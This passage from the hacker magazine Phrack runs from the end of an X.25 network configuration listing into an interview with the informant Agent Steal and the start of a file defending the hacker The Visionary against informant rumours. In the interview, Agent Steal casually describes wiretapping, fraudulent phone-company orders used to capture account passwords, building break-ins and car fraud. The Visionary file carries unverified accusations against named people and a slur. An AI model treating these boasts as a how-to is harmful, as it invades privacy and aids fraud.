  12313. Host ID : 7
  12314.  
  12315. Do you wish to specify an NSAP for this host?: Y
  12316.  
  12317. NSAP Address:
  12318.  
  12319.     Authority and Format Identifier (AFI) (0-99): 50
  12320.  
  12321.     Initial Domain Identifier (Local Form): null
  12322.  
  12323.     Domain Specific Part (max 19 ascii characters): patbbs
  12324.  
  12325.  
  12326.                               DEVICE CONFIGURATION
  12327.  
  12328.  
  12329. Device Name: ISC_DCF
  12330.  
  12331. Device Type  (DCU,MCA,NBS,ISC,PMGR_ASYNC,ILC,
  12332.               ICB,IBC,LLC,SNA,LSC,IDC,LDC,MRC,IRC,LRC,XLC,XSC): ISC
  12333.  
  12334. Device code (in octal): 37
  12335.  
  12336. Run SDLC or HDLC on this controller: HDLC
  12337.  
  12338.  
  12339.                                LINK CONFIGURATION
  12340.  
  12341.  
  12342. Link Name: SPRINTNET                    Device Name: ISC_DCF
  12343.  
  12344.                                         Device Type: ISC
  12345.  
  12346. Network Type : TELENET                  Line # (0-7) : 0
  12347.  
  12348. Protocol Type(LAP,LAPB,SDLC) : LAPB
  12349.  
  12350. Local Host Address (2-15 decimal digits) : 31109090063100
  12351.  
  12352. Sequence Numbering Modulus (8,128) : 8
  12353.  
  12354. Connect retry count (0-99)   :   20     Transmit retry count (0-99)  :    10
  12355.  
  12356. Transmit timeout (-1,0-3600) :    3     Enable timeout (-1,0-3600)   :    30
  12357.  
  12358. Frame Window Size (1-7)      :    7     Packet Window Size (1-7)     :     2
  12359.  
  12360.                             Max Packet Size (32,64,128,256,512,1024) :   128
  12361.  
  12362. Framing Type (HDLC,BSC)      : HDLC     HDLC Encoding (NRZ,NRZI)     :   NRZ
  12363.  
  12364. Clocking (EXTERNAL,INTERNAL) : EXTERNAL
  12365.  
  12366. FULL or HALF duplex line     : FULL
  12367.  
  12368.  
  12369. --------------------------  Virtual Call Numbering  --------------------------
  12370.  
  12371.  
  12372. # PVC'S :   0                           # SVC'S :  63   Start SVC # :    1
  12373.  
  12374.  
  12375. ------------------------------------------------------------------------------
  12376.  
  12377.  
  12378.   Network Attributes
  12379.   ------------------
  12380.  
  12381.           Calling DTE in Outgoing Calls (Y/N): Y
  12382.           Personal Cause Code (Y/N)          : N
  12383.           Long Interrupt Packets (Y/N)       : N
  12384.           Timeout Resets (Y/N)               : Y
  12385.           Timeout Clears (Y/N)               : Y
  12386.           Mandatory Diagnostics (Y/N)        : N
  12387.           Extended Addressing (Y/N)          : Y
  12388.           Extended Clear Packets (Y/N)       : Y
  12389.  
  12390.   X25 Facilities Enabling
  12391.   -----------------------
  12392.  
  12393.           Allow packet size negotiation (Y/N)  : Y
  12394.           Allow window size negotiation (Y/N)  : Y
  12395.           Allow fast select (Y/N)              : Y
  12396.               1. local connections (Y/N)       : N
  12397.               2. routed connections (Y/N)      : N
  12398.           Allow reverse charging outgoing (Y/N): Y
  12399.           Allow closed user groups (Y/N)       : Y
  12400.           Allow network user ID (Y/N)          : Y
  12401.           Allow throughput class (Y/N)         : Y
  12402.           Allow transit delay (Y/N)            : Y
  12403.           Allow transit delay indication (Y/N) : Y
  12404.           Allow charging information (Y/N)     : Y
  12405.           Allow RPOA selection (Y/N)           : Y
  12406.           Allow user defined facilities (Y/N)  : Y
  12407.           Allow unknown facilities (Y/N)       : Y
  12408.           Allow extended facilities (Y/N)      : Y
  12409.           Allow facilities to be routed (Y/N)  : Y
  12410.  
  12411.  X25 Facilities           Generated?
  12412. ------------------------- ---------
  12413.  
  12414.  1. Packet Size Facility      N    Minimum:  32             Maximum:     128
  12415.  2. Window Size Facility      N    Minimum:  1              Maximum:     2
  12416.  3. Fast Select Facilities    N    Type:
  12417.  4. Reverse Charging          N
  12418.  5. Closed User Groups        N    Type:     None           ID:          --
  12419.  6. Network User ID           N    ID:
  12420.  7. Throughput Class          N    Called:                  Calling DTE:
  12421.  8. Transit Delay             N    Delay:    0
  12422.  9. Charging Information      N    Request?  N
  12423. 10. RPOA Selection            N    # IDs:    0
  12424. 11. User Defined Facilities   N
  12425. 12. Other Facilities          N
  12426.  
  12427.  
  12428.                             REMOTE HOST CONFIGURATION
  12429. -----------------------------------------------------------------------------
  12430.  
  12431.  
  12432. BOOMBOOM
  12433.  
  12434.                             X.25 Host Parameters
  12435.  
  12436.  
  12437.     Remote Host Filename : BOOMBOOM
  12438.  
  12439.     Remote Host Name     : BOOMBOOM
  12440.  
  12441.     Remote Host ID       : None
  12442.  
  12443.     Hostfile AOS/VS ACL  : + RE
  12444.  
  12445.     Accepts address extension facilities?: N
  12446.  
  12447.  
  12448.   Link Name        Device Type   Network Type    Remote Address
  12449.  
  12450. 1 SPRINTNET        ISC           TELENET        host address in decimal :
  12451.  
  12452.                                                   31109200010200
  12453.  
  12454.  
  12455. -----------------------------------------------------------------------------
  12456.                                 NPN CONFIGURATION
  12457. -----------------------------------------------------------------------------
  12458.  
  12459. TELNETD
  12460.  
  12461.     NPN-type entry name:  TELNETD
  12462.     NPN:                  0023
  12463.     NPN AOS/VS ACL:       + RE
  12464. -----------------------------------------------------------------------------
  12465.  
  12466.  
  12467. ACRONYMS
  12468. ~~~~~~~~
  12469.  
  12470. ADM       Automatic Density Matching
  12471. CLASP     CLass Assignment And Scheduling Package
  12472. CLI       Command Line Interpreter
  12473. CPL       Characters per Line
  12474. IPC       Inter-Process Communications
  12475. LPP       Lines per Page
  12476. PID       Process ID; PID 2 is the "master CLI"
  12477. SMI       System Manager Interface
  12478.  
  12479.  
  12480.  
  12481.                              ==Phrack Magazine==
  12482.  
  12483.                  Volume Four, Issue Forty-Four, File 16 of 27
  12484.  
  12485. ****************************************************************************
  12486.  
  12487.  
  12488. An Interview With Agent Steal
  12489. By Mike Bowen, Agenta  Aka Agent 005
  12490.  
  12491. Please note that all of the information in this interview is
  12492. documented in F.B.I. files and can be verified.
  12493. ______________________________________________________________________
  12494.  
  12495. MB: Well I guess the first question is the biggest one. Is it true that
  12496.     you are an F.B.I. informant?
  12497.  
  12498. AS: Yes.
  12499.  
  12500. MB: Why?
  12501.  
  12502. AS: First of all I didn't have that much of a choice. If I didn't
  12503.     cooperate with The Bureau, I could have been charged with possession
  12504.     of classified government material. That carries a penalty of over
  12505.     10 years. There is not a lot of people that I would go to jail that
  12506.     long for. I was able to keep my two closest friends out of trouble.
  12507.     That was part of my deal. It was already too late for Kevin Poulson
  12508.     and Ronald Austin.
  12509.  
  12510. MB: Yeah, I think that most hackers would have done the same as you.
  12511.  
  12512. AS: Most hackers would have sold out their mother.
  12513.  
  12514. laughter
  12515.  
  12516. MB: How come you never busted me?
  12517.  
  12518. AS: Well I certainly had the opportunity to. You probably remember that
  12519.     I was calling you about a year ago and poking you for information.
  12520.     I just didn't consider you to be a dangerous or malicious hacker.
  12521.  
  12522. MB: Thanks, I guess.
  12523.  
  12524. AS: Just make your check out to....
  12525.  
  12526. laughter
  12527.  
  12528. MB: As everyone should know, Kevin Poulson "Dark Dante" was your partner.
  12529.     That was what you referred to in your BBS posts as The Inner Circle
  12530.     1990. Poulson was featured on TV's' Unsolved mysteries as a wanted
  12531.     fugitive hacker. The United States Attorney called him, "The Hannibal
  12532.     Lecter of computer crime".
  12533.  
  12534. AS: I would not compare him to Lecter, I would say he is more of a
  12535.     G. Gordon Liddy.
  12536.  
  12537. laughter
  12538.  
  12539. MB: Regardless, Kevin is now in jail awaiting trial in San Francisco. He
  12540.     has been there for two years and when he is done, there are more
  12541.     charges awaiting him in Los Angeles. He may spend up to 15 years
  12542.     in prison. How much time do you think that you will do?
  12543.  
  12544. AS: The six months I did in Texas while I was negotiating my plea agreement
  12545.     will probably be it.
  12546.  
  12547. MB: How many people did you have to bust to get out of that one?
  12548.  
  12549. AS: I'm not at liberty to say
  12550.  
  12551. MB: I see. So are you still involved with the F.B.I.?
  12552.  
  12553. AS: I believe that my cover is pretty much blown at this time so my
  12554.     usefulness is limited. I would say that I'm done. However, I have
  12555.     received several other offers to work with other computer security
  12556.     related organizations. So watch your asses kiddies, it's easy to
  12557.     change my handle!
  12558.  
  12559. MB: Why do you think you are getting these offers? You are a convicted felon.
  12560.  
  12561. AS: I guess I have an honest face, heh, and the work I did for the
  12562.     bureau was very good. I think I was cut out to be in the investigative
  12563.     business.
  12564.  
  12565. MB: Well, you have been working for private investigators for quite some time.
  12566.  
  12567. AS: Yes, I handled all of their computer information searches in addition to
  12568.     phone tapping, break ins, phone tap and bug detection.
  12569.  
  12570. MB: Was that profitable?
  12571.  
  12572. AS: Well, in addition to all of those radio station contests we were
  12573.     winning, I was doing OK. Driving a Porsche and living in Beverly
  12574.     Hills wasn't to bad.
  12575.  
  12576. MB: I guess all good things come to an end.
  12577.  
  12578. AS: I will always manage some how, I'm a survivor.
  12579.  
  12580. MB: There was another partner involved with you. Wasn't his name Ron Austin?
  12581.  
  12582. AS: Yes, he got busted too.
  12583.  
  12584. MB: How much trouble is he in?
  12585.  
  12586. AS: He is going to testify against Poulson also, so he'll probably only get
  12587.     a year or two.
  12588.  
  12589. MB: Are you two still friends?
  12590.  
  12591. AS: Very much so. He understood the situation I was in. I still talk to him
  12592.     frequently.
  12593.  
  12594. MB: What is he up to these days?
  12595.  
  12596. AS: He told me he was going to find a cause and become the first computer
  12597.     hacker turned international terrorist.
  12598.  
  12599. laughter
  12600.  
  12601. MB: I wouldn't want to be his enemy! Speaking of enemies, what do you think
  12602.     Poulson will do to all the people who testified against him when he gets
  12603.     out?
  12604.  
  12605. AS: Well he is going to be busy. Everyone who he has ever known has turned
  12606.     against him.
  12607.  
  12608. MB: Well if he wasn't such a sneaky jerk maybe someone would like him.
  12609.  
  12610. AS: He brought it on himself.
  12611.  
  12612. MB: Do you expect any retaliation from the hacker community?
  12613.  
  12614. AS: There will probably be a few narrow minds out there. However, I have
  12615.     been very careful to conceal my true identity. People may know my real
  12616.     name if they read the papers, but that won't get them far. I find
  12617.     people for a living, I don't think it will be hard to use what I know
  12618.     to keep a low profile. Besides, what is a hacker going to do, turn off
  12619.     my phone? Regardless, If some one fucks with me, I'll just have to fuck
  12620.     back. I have a lot of friends and resources now.
  12621.  
  12622. MB: What was it like working with the F.B.I.?
  12623.  
  12624. AS: Very interesting and educational. I have learned a lot about how the
  12625.     bureau works. Probably too much. Obviously I can't say very much.
  12626.     However, I can say that my involvement was extensive. There was a lot
  12627.     of money and resources used. In addition, they paid me well.
  12628.  
  12629. MB: Would you say it was fun?
  12630.  
  12631. AS: Most of the time. They actually flew me to Summer Con in St. Louis.
  12632.     I would say the bureau had that conference pretty well covered.
  12633.     Erik Bloodaxe was there too. It was pretty funny. I think we both knew
  12634.     that each other was working for the bureau. One of the agents I worked
  12635.     with let it slip out. We were sitting across from each other at the
  12636.     conference, kind of smirking at each other. And the balls Erik had!
  12637.     He video taped the whole thing! It was classic.
  12638.  
  12639. MB: What was the F.B.I. trying to accomplish?
  12640.  
  12641. AS: I believe they were trying to send a message that high level computer
  12642.     hacking is something that is very serious. In Poulson's' case as you are
  12643.     aware, we got into some really heavy shit. So heavy in fact that I had
  12644.     to sign an agreement that I would never disclose any of the top secret
  12645.     information that I had seen.
  12646.  
  12647. MB: That's pretty wild. The article about Poulson, Austin and you in
  12648.     The Los Angeles Times Sunday Magazine was really interesting. For
  12649.     those who want to read it the date was September 12, 1993.
  12650.  
  12651. AS: I was amazed how deep that reporter was able to go. He really hit the
  12652.     nail on the head. Personally I think he wrote too much. He wrote that
  12653.     we were able to get a list of every federal wire tap in California!
  12654.  
  12655. MB: Really?
  12656.  
  12657. laughter
  12658.  
  12659. AS: Like I said, I can neither confirm or deny that statement. There is
  12660.     still a lot of information regarding our activities that has not been
  12661.     published. Between the three of us, we were into a bunch of shit. One
  12662.     of these days, it will all be out.
  12663.  
  12664. MB: The reporter also said you would take control of phone lines with
  12665.     a telephone company computer. Then you would seize radio station lines
  12666.     and win contests.
  12667.  
  12668. AS: Now that we can talk about. We won tens of thousands of dollars, trips
  12669.     to Hawaii and a few Porsches. The government took both of my Porsches
  12670.     away from me.
  12671.  
  12672. MB: I didn't realize that you had two.
  12673.  
  12674. AS: Yeah, a friend of mine was selling his. So I had him report it stolen
  12675.     and collect the insurance. I gave him a $1000 and it was mine. I
  12676.     loved that car.
  12677.  
  12678. MB: I see that was the interstate transportation of a stolen automobile
  12679.     charge that was filed in Texas?
  12680.  
  12681. AS: Yeah , I changed the VIN numbers and everything. It was really clean.
  12682.     However, when I got raided they went over everything with a fine tooth
  12683.     comb. There were so many agencies involved. The F.B.I., The Secret
  12684.     Service , SW Bell Security, Pacific Bell Security, Dallas Sheriff,
  12685.     L.A.P.D. Computer Crime Unit, The United States Postal Inspector,
  12686.     Telenet and Tymnet Security and eventually The Department of Motor
  12687.     Vehicles Security Unit. What a mess, everyone wanted a piece of
  12688.     the action. But you know who always gets their man.
  12689.  
  12690. MB: The Bureau.
  12691.  
  12692. AS: Yep, pissed a few people off too.
  12693.  
  12694. MB: Where did you get the name Agent Steal?
  12695.  
  12696. AS: About ten years ago, I was under investigation by The Secret Service
  12697.     for computer hacking. The case agent was Special Agent Steele. That
  12698.     is when I became a fugitive. I left town, dropped contact with my
  12699.     friends, and changed my name. I moved to California.
  12700.  
  12701. MB: What are some of your favorite hacks?
  12702.  
  12703. AS: Probably the Telenet tap I put up.
  12704.  
  12705. MB: You mean the private dial up tap that you had told me about?
  12706.  
  12707. AS: Yeah, I placed the order in COSMOS for a bridge lifter on the first
  12708.     line in hunt of my local Telenet dial up and a 1FR to appear in an
  12709.     office building a half mile from the LA Telenet dial up.
  12710.  
  12711. MB: That was great. That device you built was cool. All you had to do was
  12712.     dial up the number, connect with your modem and you could sit there
  12713.     and watch people type in their passwords all day long.
  12714.  
  12715. AS: I must have snagged over 500 accounts on that thing.
  12716.  
  12717. MB: That's where you got your DMV account wasn't it?
  12718.  
  12719. AS: Yes. I made a small fortune reselling the information to P.I.s'
  12720.  
  12721. MB: What was it you told me about tapping Heidi Fliess?
  12722.  
  12723. AS: Yeah. I tapped the phone of one of her working girls. It was for this
  12724.     rich guy who would hire hookers and then get involved with them. He
  12725.     loved hookers. He used to keep tabs on this one.
  12726.  
  12727. MB: What were the conversations like.
  12728.  
  12729. AS: I rarely would listen to the tapes I made. I have a life, thank you.
  12730.     Besides, I have found that about 99.9% of all phone conversations
  12731.     are really boring.
  12732.  
  12733. MB: Have you listened to many?
  12734.  
  12735. AS: Thousands, from cellular to cordless to inter office T-carrier lines
  12736.     to long distance microwave. I guess I am a phone tap expert. Poulson
  12737.     and I would break into C.O.s on a regular basis. We had our own keys
  12738.     and I.D. badges. We came and went as we pleased. I would sometimes
  12739.     play around with the long distance trunks. That was always interesting.
  12740.     With a T-carrier test set you could scan through all of the channels
  12741.     and hear dozens of phone calls with the flick of a switch.
  12742.  
  12743. MB: What is the most powerful computer that you had access to.
  12744.  
  12745. AS: Good question. There really isn't one computer system out there that
  12746.     is "all" powerful, with the exception of maybe some defense
  12747.     computers. I made a point of staying away from those. However, if
  12748.     I had to pick just one computer to have access to I would say it
  12749.     was XXXXXXX. That was the Pacific Bell system that allowed us to
  12750.     drop in and monitor and control phone lines from home with the use
  12751.     of a computer system. Second would have to be DMV or COSMOS.
  12752.     Yes COSMOS. I thought that being able to place my own orders was
  12753.     important, not to mention more reliable than the business office.
  12754.  
  12755. MB: Cheaper too.
  12756.  
  12757. laughter
  12758.  
  12759. AS: I wish I had all the money I have saved on phone bills!
  12760.  
  12761. MB: Those days are gone.
  12762.  
  12763. AS: At least the days of doing that safely. People tend to get pessimistic
  12764.     about hacking. I have heard some say that the good old days of boxing
  12765.     and such are gone. I disagree, we just have to adapt. As sure as
  12766.     technology advances so will hacking. There will always be new "hacks".
  12767.     It's up to the real hackers to find them. Learn from the past and move
  12768.     on or get busted and quit.
  12769.  
  12770. MB: What is up with Kevin Mitnick?
  12771.  
  12772. AS: I had never met him before I was busted. When I went to work for the
  12773.     bureau I contacted him. He was still up to his old tricks so we opened
  12774.     a case on him and Roscoe. It's a long story but they wound up getting
  12775.     busted again. Mitnick got tipped off right before they were going to
  12776.     pick him up. So he's on the run again. Roscoe wasn't so lucky. This
  12777.     will be Mitnick's fifth time to get busted. What a loser. Everyone
  12778.     thinks he is some great hacker. I out smarted him and busted him.
  12779.     Poulson blows him away as well.
  12780.  
  12781. MB: Do you feel bad about working undercover to arrest hackers?
  12782.  
  12783. AS: Not really. We all know the risks. For me it was just a job. And an
  12784.     interesting one at that. I wasn't out there just busting anyone. We
  12785.     were looking for the hard core malicious hackers. I passed up a lot
  12786.     of people in the course of the investigation. They should know who
  12787.     they are by now. The ones that got taken down deserved it. It will
  12788.     all be in the papers some day.
  12789.  
  12790. MB: Did you deserve what you got.
  12791.  
  12792. AS: Yeah, I was getting pretty carried away there for a while. I invaded a
  12793.     lot of peoples privacy. Phones taps, credit reports, breaking into
  12794.     Pacific Bell offices etc.
  12795.  
  12796. MB: Didn't you break into PacBells' security department?
  12797.  
  12798. AS: Yes, Poulson and I broke into the high rise downtown. We wanted to
  12799.     find out how far their investigation of us had gone.
  12800.  
  12801. MB: Did you find what you wanted?
  12802.  
  12803. AS: Yeah, DNR print outs, notes and photos! We also found a lot of
  12804.     information regarding other investigations and how they do wire taps.
  12805.  
  12806. MB: Very dangerous in the wrong hands.
  12807.  
  12808. AS: We are the wrong hands.
  12809.  
  12810. laughter
  12811.  
  12812. MB: Oh yeah. How did you get caught?
  12813.  
  12814. AS: Well as you know I moved to Texas after that high speed chase with the
  12815.     L.A.P.D. undercover units. I found out that I was under surveillance
  12816.     and had to make a run for it!
  12817.  
  12818. MB: Was that pretty close?
  12819.  
  12820. AS: In a Porsche on a canyon road? Not until the helicopter appeared!
  12821.  
  12822. MB: How did you get away?
  12823.  
  12824. AS: I parked the car in a garage after losing them then hid under another
  12825.     car for three hours. They eventually gave up looking. I called a
  12826.     cab with my cellular phone and left the area. Getting back to getting
  12827.     caught. I believe it was from an elaborate multi-company phone trace.
  12828.     I didn't think that they would go through all the trouble to try and
  12829.     trace my calls though several carriers. But I guess they did. The
  12830.     Pacific Bell people were very hot for me. They must have pulled everyone
  12831.     together.
  12832.  
  12833. MB: This sounds like a book or a made for TV movie.
  12834.  
  12835. AS: One can only hope.
  12836.                               ==Phrack Magazine==
  12837.  
  12838.                  Volume Four, Issue Forty-Four, File 17 of 27
  12839.  
  12840. ****************************************************************************
  12841.  
  12842.  
  12843.  
  12844. [Editor's commentary:
  12845.  
  12846.  What you are about to read is a file that everyone's friend
  12847.  Pat (Visionary / Traxxter) had written some time ago and is
  12848.  currently being spreading around the net.  Bear in mind that
  12849.  this file is exactly as he wrote it.  (IE: no spell-checking
  12850.  or other editing has been done.)
  12851.  
  12852.  I want to add something from my own personal experience with
  12853.  Traxxter.  At Comsec one evening, we received a phone call from
  12854.  Pat.  Scott and I took the call and listened to Pat for nearly
  12855.  an hour.  During this call Pat continually over-stressed the
  12856.  point about how much he hated being called a narc.  He said
  12857.  "I know you guys understand about turning people in, now that
  12858.  you are doing Comsec."  In his thinking that by our new charter
  12859.  as security consultants we were suddenly policemen as well,
  12860.  he went into a big spiel about his involvement with security
  12861.  officers at long distance carriers and how he regularly provided
  12862.  information to them.
  12863.  
  12864.  Now, you may feel that whatever transgressed between Pat and
  12865.  the locals causing him and his family so many problems
  12866.  may or may not warrant the action that was taken by them.
  12867.  I personally follow a simple rule regarding such things:
  12868.  If you mess with me at home it's just a pissing match and I'll
  12869.  insult you back night and day, but if you try to come between me
  12870.  and my livelihood or my ability to work or put food on my table
  12871.  I'm gonna put you in jail.  Obviously I'm not the only one
  12872.  who feels that way.
  12873.  
  12874.  In all honesty, I could care less about this, but since Pat
  12875.  submitted this file to Phrack, I am going to give it fair
  12876.  treatment and publish it for him.]
  12877.  
  12878. -----------------------------------------------------------------------------
  12879.  
  12880.                       Visionary The Story About Him.
  12881.  
  12882.  
  12883. This file is beeing published due to the wide spread rumors about a hacker known
  12884. as The Visionary.  The reason behind the distribution of the file is to clear up
  12885. a lot of misconseptionspeople have about this individual.  Those reading it are
  12886. asked to keep an open mind.  Encluded in the file will be buffers from people
  12887. who know The Visionary.  After reading it there is hope the rumors come to an
  12888. end.
  12889.  
  12890.  
  12891.      There have been a number of stories that people have brought up in relation
  12892. to The Visionary.  So you will hear the truth in relation to each story.  Many
  12893. have been spreading rumors without getting the facts first, so therefore a lot
  12894. of stories going around were either overdramatised or without foundation.
  12895.  
  12896.  
  12897.      The first thing that originally started the rumor was an event which
  12898. happened in the mid 1980s.  The Visionary had been modeming for just over a year
  12899. back then.  He as well as several other people had become associated with some
  12900. other local hackers.  The local hackers in question were, Oedipus Rex who ran a
  12901. board known as The Apple Tree in 305.  The other two were known as Unknown
  12902. Soldier of LOD and a guy known as The Technician.  There were a couple others
  12903. involved with them but the identity is not known.  Anyway they became angery at
  12904. the other hackers I knew and started unnecessary problems.  Unknown Soldier
  12905. giving out the number to his other friends in order to harass a kid known as The
  12906. Insider.  Every time Insider had his number changed to a nonpublished one,
  12907. Unknown Soldier loged into Cosmosand using his knowledge obtained the new number
  12908. At the same time Oedipus Rex along with his friends were pulling other serious
  12909. things on me as well as the local people I knew.  1.  He would harass me and my
  12910. parentsall times of the night.  On two ocations he was seen driving in my
  12911. neighborhood on the same night someone shot my front windows out.  It was shown
  12912. the Unknown had logged on TRW and obtained the credit history belonging to my pa
  12913. parents as well as otherpeople's parents.  On one ocation Oedipus Rex with a few
  12914. others had convinced a few of my friends to meet them at a remote location
  12915. after a hacker meeting.  When this happened OedipusRex sprayed the people with a
  12916. substance known as mace.  This amoung other things like, property damage, credit
  12917. information being changed and other acts of anarchy were performed against us.
  12918. I The Visionary don't know why they started on me as well when I did nothing to
  12919. diserve this.  Things come to ahead when The Unknown Soldier bragged to one of
  12920. us that he could get confidential information on their parents.  The kid he was
  12921. bragging to went to his parents because there was already problems.  His father
  12922. got the local Bell operating company involved and things progressed from there.
  12923. Inside five months Unknown Soldier was busted and charged with illegal entry
  12924. into Suthern Bell's computer and CBI credit bureau.  He had to pay $1,500 to
  12925. both Bell and CBI indamages.  It's not known how much the state fined him.  It
  12926. was shown that The Visionary's parents credit history was effected in a negative
  12927. way by this guy.  After the bust the local authorities spoke to The Visionary in
  12928. regards to this guy.  Now any hacker out therewith any common sense can
  12929. understand why Visionary did not hold back when asked about these guys.  As any
  12930. hacker knows nobody should use their knowledge against someone else.  Especially
  12931. if they are going to use the parents as the target.  Visionary was more than in
  12932. his rights to do what he did.  And due to the fact this story was told without
  12933. the entire facts known it has been twisted into a gross rumor.
  12934.  
  12935.  
  12936.      For about two years after that Visionary dropped out of the seen due to
  12937. person reasons.  In late 1987 he returned back in the seen as The Traxster.  At
  12938. there were no rumors until Lex Luthor of The Legion of Doom found out about him.
  12939. Than the rumors started again.  "I don't know why people brought up the event
  12940. which happened years ago when it was long and forgoten," is one thing The
  12941. Visionary said.  From 1987 throughout 1988 a lot of people always spoke of
  12942. Visionary back than known as The Traxster.
  12943.  
  12944.  
  12945.      In the last four years certain things have been brought to light regarding
  12946. Visionary.  These events were generally recordings of Visionary either admitting
  12947. to being a narc, or one was of him talking to a suposed MCI Security agent.
  12948.  
  12949.  
  12950.      When you read the following accounts, remember logic will play a big part
  12951. in not onlyunderstanding the truth behind them, but you will find out that
  12952. Visionary's side is a lot more credible than of the rumors.
  12953.  
  12954.  
  12955.      The following is Visionary's own account in relation to the MCI tape that
  12956. a lot heard but don't know the facts behind.  "It was during the early of sumer
  12957. of 1988 when I had an interesting incounter with a hacker posing as an MCI
  12958. Security agent.  I didn't know it at the time but someone was oviously playing a
  12959. large trick on me as it was recorded either by the hacker or a person on his
  12960. threeway.  Those reading this keep in mind I am going from memory and I may not
  12961. be able to recall every small detail.  I will say this much, I have the
  12962. tape of the event that I obtained and anyone who listens to it will know that
  12963. is no MCI agent I am talking to.  I had one ocation where I was due to meet
  12964. someone on a loop.  Which loop and who I was supose to meet I don't recall.
  12965. Anyways I had been on a loop waiting for another hacker.  After a minute a guy
  12966. comes on the loop.  Upon asking his handle he said he was from MCI Security.
  12967. At first I laughed and asked who he was kidding.  I mean people MCI isn't going
  12968. to call a loop and identify themselves as such.  Well I decided after he
  12969. insisted very sincerely he was MCI, I decided to play along.  I made up the
  12970. story that I was someone that delt with telco security and wouldn't mind talking
  12971. to him.  We started talking about things like ANI and different services.  Keep
  12972. keep in mind I know he wasn't MCI at all.  The conversation lasted around thirty
  12973. to fourty-five minutes.  I am able to give some idea of time beings I have the
  12974. tape and have listened to it.
  12975.  
  12976.  
  12977.      After the event I forgot about the entire thing.  It wasn't until a few
  12978. months later when I heard about the recording with me talking to MCI.  At first
  12979. I was extremely puzzeled by this news.  Than I heard samples of the recording
  12980. and instantly knew what it was about.
  12981.  
  12982.  
  12983.      Now when listening to the tape you will find a couple things very strange
  12984. about it.  When people told me about it, I was told that someone had remobed my
  12985. line, someone had used LMOS and other outlandish things.  When listening to the
  12986. tape the first thing that is ovious is the suposed MCI guy I am talking to is
  12987. much louder than me.  I mean you can hear him booming compared to my side of the
  12988. conversation.  The second thing is you hear music in the background.  The last
  12989. fact mentioned is not important but could be if you listen to it.
  12990.  
  12991.  
  12992.      This tape caused a lot of people to have second thoughts of associating
  12993. with me.  When one hears it, usually it sounds pretty real if you make a quick
  12994. judgement.  People such as Phiber Optic, Zod of MOD and even a local friend of
  12995. mine who knew me for a long while were convinced by it.  I feel that either
  12996. someone had either played a bad trick on me, or it was a situation where two
  12997. people happened to find me and I become an unfortunate victom.  At the time the
  12998. rumors had pretty much stopped and if the tape hadn't come about I suspect
  12999. things would have blown over.
  13000.  
  13001.  
  13002.      The second event involving me on tape, was with me and Doc Haliday.  It was
  13003. in the fall of 1990, during the time of the 404 bridge.  The rumor about me had
  13004. still been going on due to the MCI tape.  One of the hackers that happened to
  13005. call the bridge was Doc Haliday.  Doc Haliday is a somewhat wellknown hacker who
  13006. associates with people in the Texas area.  He was known to frequent a HP board
  13007. known as Unholy Temple, and he has also written for Phrack.  One particular
  13008. ocation, Visionary was on the 404 bridge he met Doc Haliday.  Doc Haliday called
  13009. him shortly after they met on the bridge.  The first conversation was about the
  13010. rumors he heard about Visionary and his thoughts on them.  Haliday than related
  13011. to Visionary that he didn't aprove of a lot of hacker activity now a day.  He
  13012. said in so many words the stuff hackers seemed to do was extremely wrong.  This
  13013. statement didn't hit Visionary quite right, due to the fact Doc Haliday had been
  13014. into hacking a long time.  Doc Haliday's next statement made Visionary feel
  13015. there was more  to him than met the eye.  "I don't aprove of those who use
  13016. access devices," stated Doc Haliday to Visionary.  Now anyone reading this may
  13017. know it, but the term access devices or access codes is the legal term the
  13018. authorities use in court cases.  When Visionary heard this, the first signs of
  13019. dout about Doc Haliday began.  "When he used the term access devices, an allarm
  13020. bell went off in my head," was Visionary's words.  The next day, again him and
  13021. Doc Haliday had another conversation.  This is when Visionary had his douts
  13022. confirmed.  Haliday started out by informing The Visionary of an investigation
  13023. on the 404 bridge.  He said a friend of his from The Secret Service had warned
  13024. him, due to an inpending bust of a number of people.  This news shocked
  13025. Visionary like a slap in the face, and things started getting stranger.  Doc
  13026. Haliday explained there was a lot of monitoring of the bridge, as well as a
  13027. pending investigation on Super Niggar.  At this point Vision made a decision to
  13028. play his Trump card.  Slowly Visionary was able to get Haliday to admit that he
  13029. did next to nothing illegal any more.  When asked Haliday gave an impression he
  13030. was not against informents but was open to it himself.  This is when Visionary
  13031. began to lead Haliday to the belief that he was an informent.  Haliday bought
  13032. the bate hook line and sinker.  He told Visionary all about the dealings with
  13033. Secret Service in the past, and how he had made six federal cases for them thus
  13034. far.  Visionary made up a story to the effect of him beeing involved in simular
  13035. activities.  The entire thing on Visionary's part was to confirm his own douts
  13036. regarding Haliday.  However one thing happened which screwed up Visionary.
  13037. Doc Haliday had been recording the entire conversation.  After he hung up from
  13038. Visionary, he proceded to play it to everybody.  His reason for saying what he
  13039. said was to bolshit Visionary into admitting to narcing.
  13040.  
  13041.  
  13042.     All of y     The people that heard the tape were not able to hear the entire
  13043. thing.  Haliday only played segments and made himself the big social enginer.
  13044. Some of you out there may ask, who should believe?  Well look at it this way.
  13045. if you hear the tape or hear Haliday's side it sounds like he is bolshitting
  13046. Visionary.  However again like the other time to many things don't tigh
  13047. together.  First off Visionary, if he was an informent would not admit to
  13048. anybody as such.  It may seem to some that a confidents was built but Visionary
  13049. would not be that stupid.  Remember people he has a lot of rumors go around
  13050. about him.  A couple other things come into play here.  Doc Haliday was a very
  13051. smart and carful individual.  He didn't associate with any of the normal crouds,
  13052. nor did he even associate with most better hackers.  So, ask yourself, why did
  13053. he go to such length to expose what he thought was a narc?  Visionary didn't
  13054. even talk to anyone Haliday knew nore did Visionary pose a threat to Haliday.
  13055. A major thing all of you will remember, is Doc Haliday is part of the security
  13056. firm known as Comceck in Texas.  This is not mean much on one hand, but Haliday
  13057. is involved with computer security.  Visionary was bolshitting Haliday and when
  13058. looking at the situation the truth speaks for itself.  Any of the higher up
  13059. hackers don't concern themselves with such matters of a narc.  They don't give
  13060. two shits about lamers, yet Haliday tried to convince all of them with his
  13061. tape.
  13062.  
  13063.  
  13064.      Thus far you have read the main three reasons Visionary has had the
  13065. constant rumor which persists about him.  Now we will cover some of the little
  13066. reasons that, may not deal with tape recordings, can be misunderstood as fact.
  13067. One must take into consideration that Visionary had to put up with a lot of shit
  13068. due to the rumors, and he had to do some interesting stuff to get by.  One
  13069. thing he did, was to let certain hackers think he was a narc.  All of you out
  13070. there will ask why would he do this?  Well it's simple.  Visionary ran acrossed
  13071. some people that it was to his advantage to let them believe anything.  One
  13072. case with the members of a group known as MOD.  MOD was known by many to harass
  13073. a lot of people.  They had heard about Visionary, and believed that to harass
  13074. someone in his line of work would be the death of them.  Anotherwords, if you
